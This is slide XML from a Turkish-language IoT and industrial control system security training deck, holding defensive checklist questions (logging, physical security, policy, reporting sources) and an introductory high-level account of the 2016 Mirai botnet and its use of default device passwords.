            <a:endParaRPr b="1" sz="15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Olay müdahale planı ICS ortamı için özelleştirilmiş mi?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Loglar, merkezi bir yerde toplanıyor mu (SIEM, syslog sunucusu)?</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Kritik olaylar için alarm tetikleyici yapılandırılmış mı?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Olay sonrası analiz ve iyileştirme adımları belgeleniyor mu?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10. Fiziksel Güvenlik</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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Kontrol odası ve sunucu odalarına giriş yetkileri sınırlı mı?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Fiziksel erişim log’ları tutuluyor mu?</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Kamera, alarm ve giriş kontrol sistemleri entegre mi?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379125" y="221975"/>
            <a:ext cx="10126200" cy="366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11. Politika, Eğitim ve Farkındalık</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OT personeli için siber güvenlik eğitimleri veriliyor mu?</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Politika belgeleri (erişim, yedekleme, yama yönetimi vb.) tanımlanmış mı?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Tedarikçiler için güvenlik şartları ve SLA maddeleri mevcut mu?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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12. ICS Özel Raporlama Kaynakları</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CISA ICS Alerts takip ediliyor mu?</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MITRE ATT&amp;CK for ICS matrisi üzerinden tehdit modellemesi yapılıyor mu?</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Black Kite, Claroty, Dragos gibi özel analiz platformları kullanılıyor mu?</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700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checklistler:</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ICS sistemleri kurulum öncesi denetiminde,</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Penetrasyon testi sonrası durum değerlendirmesinde,</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Regülasyon uyumluluğu (NIST SP 800-82, IEC 62443) kontrolünde kullanılabilir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;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pic>
        <p:nvPicPr>
          <p:cNvPr id="485" name="Google Shape;485;p69" title="thank you.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-46225"/>
            <a:ext cx="9144000" cy="5189724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3638285" y="4487725"/>
            <a:ext cx="13695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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/ferdigul</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;487;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056690" y="4405147"/>
            <a:ext cx="548745" cy="519057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1577592" y="4473175"/>
            <a:ext cx="12390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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/gulferdi</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Google Shape;489;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215853" y="4473156"/>
            <a:ext cx="361754" cy="342182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Mail icon clipart" id="490" name="Google Shape;490;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135335" y="4473156"/>
            <a:ext cx="390474" cy="369348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5653350" y="4487725"/>
            <a:ext cx="25473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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0xfrd1gul@gmail.com </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="492" name="Google Shape;492;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226938" y="518750"/>
            <a:ext cx="962620" cy="888150"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1860000" w="2619375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2619375" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619375" y="1860000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1860000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Google Shape;493;p69" title="KOÜ Teknopark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23517" l="0" r="0" t="21980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2588164" y="588775"/>
            <a:ext cx="1404350" cy="748101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p69" title="Cyberus.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="824950" y="588776"/>
            <a:ext cx="1404339" cy="74809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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397625" y="475925"/>
            <a:ext cx="8450700" cy="4512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 sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Giriş: IoT Nedir? ve Neden Güvenlik Önemlidir?</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IoT (Internet of Things) tanımı ve örnekler (akıllı evler, endüstriyel IoT, sağlık cihazları, vs.)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Artan cihaz sayısı = Artan saldırı yüzeyi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Gerçek dünyadan IoT zafiyet vakaları</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Örn: Mirai Botnet (2016), Jeep Cherokee Hack (2015)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Olayın Özeti (Mirai Botnet - IoT Güvenliği için Dönüm Noktası)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tarih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Eylül 2016</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Saldırının Türü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Dağıtık Hizmet Reddi (DDoS - Distributed Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Araç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Mirai adlı zararlı yazılım (malware)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hedefler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Dyn DNS hizmeti, Krebs on Security, OVH gibi büyük servis sağlayıcılar</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mirai Nasıl Çalışıyordu?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mirai, internete bağlı IoT cihazlarını (örneğin:</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Güvenlik kameraları,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP kameralar,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ev yönlendiricileri (router),</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVR cihazları)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gibi cihazları hedef alarak onları birer </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“zombi” cihaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dönüştürdü ve </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ağına kattı.</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu cihazların çoğu varsayılan kullanıcı adı ve şifre (örnek: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin:admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) ile korunuyordu.</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mirai, internette bu cihazları tarayıp zayıf oturum açma bilgilerini kullanarak onları ele geçirdi.</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ele geçirilen cihazlar daha sonra, saldırganlar tarafından yönetilen merkezi sunuculara bağlandı.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1456625" y="1779900"/>
            <a:ext cx="7435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rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iziksel cihazların internete bağlanarak </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>veri toplaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iletişim kurması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ve gerektiğinde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otomatik işlem yapması </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sürecidir.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002925" y="2191025"/>
            <a:ext cx="3789300" cy="203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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🎯 Hedef Neydi?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mirai ile oluşturulan devasa botnet ağı, hedef sistemlere </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yüksek bant genişliği tüketen DDoS saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> düzenledi. </a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
